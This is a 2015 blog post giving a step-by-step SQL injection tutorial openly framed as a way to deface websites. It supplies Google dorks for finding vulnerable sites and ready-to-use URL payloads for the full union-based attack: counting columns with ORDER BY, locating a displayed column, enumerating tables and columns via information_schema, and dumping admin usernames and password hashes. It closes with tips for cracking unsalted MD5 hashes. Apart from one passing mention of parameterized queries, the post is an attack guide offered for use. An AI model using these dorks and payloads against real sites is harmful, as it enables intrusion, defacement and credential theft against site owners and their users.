SCM Player

Friday, 27 February 2015

SQL Injection | Step by Step deface website

What is SQL Injection?

SQL is Structured Query Language, the language used to talk to the database behind a website. Statements such as SELECT read information and INSERT, UPDATE and DELETE change it.
In this type of attack we make use of a vulnerability where the website pastes our input straight into one of those statements, so we can supply our own SQL to the website's database and successfully deface it :D . The vulnerability occurs when the user's input is not filtered, or is improperly filtered, before it is concatenated into the query string (the proper fix is to bind the value as a query parameter instead of building the query by string concatenation).

 

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so; the most common method of searching is by using dorks.

Dorks

Dorks are search-engine queries (Google) that look for pages containing the text given in the dork itself. Basically they help you find websites with a specific pattern in their URL that you know is often a sign of a vulnerable script. A hit is only a candidate: whether the parameter really reaches the database unescaped is checked in the next step.

Using Dorks

Now basically what a dork does is use Google's "inurl" operator to return websites which have a specific set of vulnerable-looking words in the URL. For that, we need to know which words in the URL make a website potentially vulnerable to a SQL injection attack: usually a script name followed by a numeric parameter (id=, prodID=, category=) that is passed straight to a query. Many websites offer comprehensive lists of Google dorks; for example, the l33tmir website has a list of hundreds of them. However, creativity is your best tool when it comes to finding vulnerable sites, and after practising with some Google dorks you will be able to create your own. A few dorks are listed below. What you have to do is paste them into the Google search bar and Google will return potentially vulnerable sites.
inurl:"products.php?prodID="
inurl:"buy.php?category="

Exploiting the vulnerability 

You have a URL that takes a numeric parameter, for example
www.something.com/news/news.php?id=130
A quick check before going further: request id=130' (a single quote appended). If the page now shows a database error, or the article disappears, the parameter is reaching the query unescaped and the site is worth pursuing.
Ok, now how do you deface it??

Finding number of columns

Now put the following in the URL
http://www.something.com/news/news.php?id=130 order by 10-- -
This tells the database to sort the result by its 10th column. A number in ORDER BY refers to a position in the SELECT list, so the query only succeeds if it really has at least that many columns. Your job is to find how many columns there are. If order by 10 gave you an error, replace 10 with 9 and try again; if 10 gave a valid page, try 11.
The -- at the end is the SQL comment marker: everything after it is commented out, so whatever the original query had after our injection (an ORDER BY of its own, a LIMIT, a closing quote) is ignored and only our query is run. MySQL requires a space after the two dashes, and browsers and servers tend to strip a trailing space from a URL, so in practice you type -- - or --+ (the + becomes a space when the URL is decoded).
So assume I got an error for order by 10, then tried order by 9 and so on. Finally I got no error at 6 and an error at 7. Hence the query (and, if it does SELECT *, the table) has 6 columns.

Find Vulnerable columns


Now we use UNION SELECT to find a vulnerable column. Remember to make the ID negative, as in id=-130: no row has that id, so the original SELECT returns nothing and only the row we append with UNION is displayed.
http://www.something.com/news/news.php?id=-130 union select 1,2,3,4,5,6-- -
Since it has 6 columns, we select 1,2,3,4,5,6 (a UNION only works when both SELECTs have the same number of columns, which is why the previous step matters) and end with the comment marker. UNION ALL SELECT also works; the ALL goes between the two keywords.
This will give an output. Whichever of those numbers shows up in the rendered page, that column is one the page actually prints, so it is the one we can read data through. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables


Now our job is to find the different tables in the database. We do the following, putting the expression in the vulnerable column (2) and leaving the other positions as numbers:
http://www.something.com/news/news.php?id=-130 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- -
Here group_concat(table_name) joins all the table names into one comma-separated string so they fit in the single row the page displays. information_schema is MySQL's built-in catalogue of every database, table and column the current user can see, and database() returns the name of the database the site is connected to, so the WHERE clause limits the list to the site's own tables. So we are just querying from that.

Finding Column names


Similarly, get all the columns by replacing tables with columns and table_name with column_name:
http://www.something.com/news/news.php?id=-130 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- -
Now you will see the column names from all the tables, one after another. Most tables start with an id column, so each time an "id" appears in the list the columns of the next table begin.
If the list is too long to display, or you only care about one table, restrict it to that table:
http://www.something.com/news/news.php?id=-130 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='some table you got from the previous step'-- -
If the site escapes quotes, MySQL accepts the table name as a hex string literal instead, e.g. table_name=0x74626c5f61646d696e for tbl_admin.

Final Step

Now, in the list of columns, look for interesting ones like username or password. You should now know the table name and the column names you want, e.g. the username and password columns of the tbl_admin table:
http://www.something.com/news/news.php?id=-130 union select 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin-- -
I just put the column names in the group_concat with 0x3a in between, which is the hex value of the ASCII colon (MySQL treats a hex literal as a string here, so no quotes are needed), and tbl_admin is the table that holds these columns.
Now I got output something like
admin:"hash",user2:"hash", and so on...
So the usernames are stored in clear here and the passwords are stored as hashes.
So your job is almost done. You now have all the users and their password hashes. Usually the passwords are unsalted MD5 hashes. A hash is not encryption and cannot be decrypted, but the unsalted MD5 of a common password can simply be looked up: paste it into Google or an online hash database, or run it through a cracker with a wordlist :p
 
 
